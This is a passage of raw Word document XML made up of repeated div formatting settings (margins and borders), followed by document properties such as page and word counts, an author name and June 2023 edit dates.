      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2045668697">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="616180103">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="250821600">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="976371679">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1045259271">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2100641507">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="26414082">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="538783724">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="83697223">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="847401019">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="1102413226">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="5432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1671">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="271204974">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="536698009">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="1311984735">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="6019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11235">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1095438443">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1101072512">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1190877620">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1327173117">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="366948681">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1097480837">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1667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41256">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1587615162">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1676223390">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1974555593">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1844540329">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="189805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2471FC-556B-4C4B-97EA-FF4DB9E5EE6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303</TotalTime>
  <Pages>18</Pages>
  <Words>4779</Words>
  <Characters>27246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Triet Tran</cp:lastModifiedBy>
  <cp:revision>205</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-06-06T01:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-08T09:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>